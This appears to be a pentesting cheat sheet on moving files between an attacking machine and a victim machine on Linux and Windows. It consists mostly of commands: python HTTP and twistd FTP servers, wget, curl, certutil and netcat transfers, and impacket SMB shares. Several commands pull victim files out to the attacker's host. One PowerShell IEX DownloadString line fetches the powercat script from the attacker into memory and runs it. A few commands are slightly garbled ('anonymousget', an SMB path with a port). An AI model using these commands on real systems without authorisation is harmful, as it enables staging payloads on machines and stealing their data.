Linux
Simple HTTP Server
With this method we will host our file to upload with a simple python server, which could also be hosted by any other server but we will use this for its simplicity, and then download it with wget in the victim (or curl if it is not installed).
Attacking machine command:
python -m SimpleHTTPServer 80
Victim machine command:
wget http://192.168.1.35/FiletoTransfer
curl -o FiletoTransfer http://192.168.1.35/FiletoTransfer
SCP(SSH utility)
This method will only be valid if the target machine has ssh and we have the credentials. We will use the scp utility to transfer the file
Attacking machine command:
scp FiletoTransfer tester@192.168.1.39:/home/tester/iron/
Netcat
We will use the tool that is known as the Swiss knife of the hacker, netcat.
Most computers with linux have it installed so this is an advantage.
Victim machine command:
nc -lvp 4444 > FiletoTransfer
Attacking machine command:
nc 192.168.1.39 4444 -w 3 < FiletoTransfer
FTP
We will mount a temporary ftp (we could use a conventional ftp) using the twistd utility to access from the victim and download the file
Attacking machine command:
twistd -n ftp -r .
Victim machine command:
wget ftp://192.168.1.35:2121/FiletoTransfer
Simple Server HTTP
This method is the same as it is to upload a file but the other way around. In this case the victim machine must have python to run the simple server. We have to take into account that we will not have permits to lift any port. We could also move our file to the web server folder if, for example, it has the apache running, although for that we should have permissions.
Victim machine command:
python -m SimpleHTTPServer 8080
Attacking machine command:
wget http://192.168.1.39:8080/FiletoDownload
Netcat
We will also use the netcat tool in reverse order to upload the file to the victim machine. It is important to take into account the permits on the ports to be used.
Attacking machine command:
nc -lvp 4444 > FiletoDownload
Victim machine command:
nc 192.168.1.35 4444 -w 3 < FiletoDownload
SCP(SSH utility)
This method will only be valid if the target machine has ssh and we have the credentials.
We will use the scp utility to transfer the file from the victim machine to ours.
Attacking machine command:
scp tester@192.168.1.39:/home/tester/iron/FiletoDownload .
Windows
Powershell DownloadFile
With this method we will host our file to upload with a simple python server, which could also be hosted by any other server but we will use this for its simplicity, and then download it with the DownloadFile function of powershell.
Attacking machine command:
python -m SimpleHTTPServer 8080
Victim machine command:
powershell.exe -c “(New-Object System.NET.WebClient).DownloadFile(‘http://10.10.10.1:8080/FiletoTransfer’,'C:\Users\test\Desktop\FiletoTransfer’)”
Certutil.exe
With our hosted file we will use the Microsoft tool certutil.exe to download the file we want.
Attacking machine command:
python -m SimpleHTTPServer 8080
Victim machine command:
certutil.exe -urlcache -split -f http://10.10.10.1:8080/FiletoTransfer FiletoTransfer
Netcat
This method is similar to the one used in netcat with linux. In order to make the transfer in this way we must have the netcat binary for our windows.
Victim machine command:
nc.exe -lvp 4444 > FiletoTransfer
Attacking machine command:
nc 10.10.10.2 4444 -w 3 < FiletoTransfer
FTP
We will use a temporary FTP to host our file. Windows has an FTP client pre-installed so we will connect and download the desired file. Our shell may not be interactive and we have to use a command file to connect and download the file.
Attacking machine command:
twistd -n ftp -r .
Victim machine command:
ftp
open 10.10.10.1 2121
anonymousget FiletoTransfer
bye
SMB
Through impacket-smbserver we will mount a smb folder on our machine, which we will access from the victim machine, downloading the file.
Attacking machine command:
impacket-smbserver -smb2support test .
Victim machine command:
copy \\10.10.10.1:8080\FiletoTransfer FiletoTransfer
Download victim files
FTP
With this method we will mount a temporary FTP in the folder where our file is located but this time with write permission. Later we will access from the victim and upload our file.
Attacking machine command:
python -m pyftpdlib -w
Victim machine command:
ftp
open 10.10.10.1 2121
anonymousput FiletoDownload
bye
Netcat
This method is similar to the one used in netcat to upload files but in reverse. In order to make the transfer in this way we must have the netcat binary for our windows.
Attacking machine command:
nc -lvp 4444 > FiletoDownload
Victim machine command:
nc.exe 10.10.10.1 4444 -w 3 < FiletoDownload
SMB
Through impacket-smbserver we will mount a smb folder on our machine that we will access from the victim machine to copy the file to be downloaded in our SMB folder
Attacking machine command:
impacket-smbserver -smb2support test .
Victim machine command:
copy FiletoDownload \\10.10.10.1:8080\FiletoDownload
Powercat
In this method we will load in memory the powercat module, a tool with which we can load a shell, send files. In this case we will use it for this same. We have the powercat.ps1 file hosted on our machine and load it using the DownloadString function. We execute powercat to send the file and through wget we download it in our machine. We will see that the download never ends but we will cancel it when it may have finished depending on the size of the file.
Victim machine command:
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.10.1/powercat.ps1');powercat -l -p 4444 -i C:\Users\test\FiletoDownload"
Attacking machine command:
wget http://10.10.10.2:4444/FiletoDownload
Reference: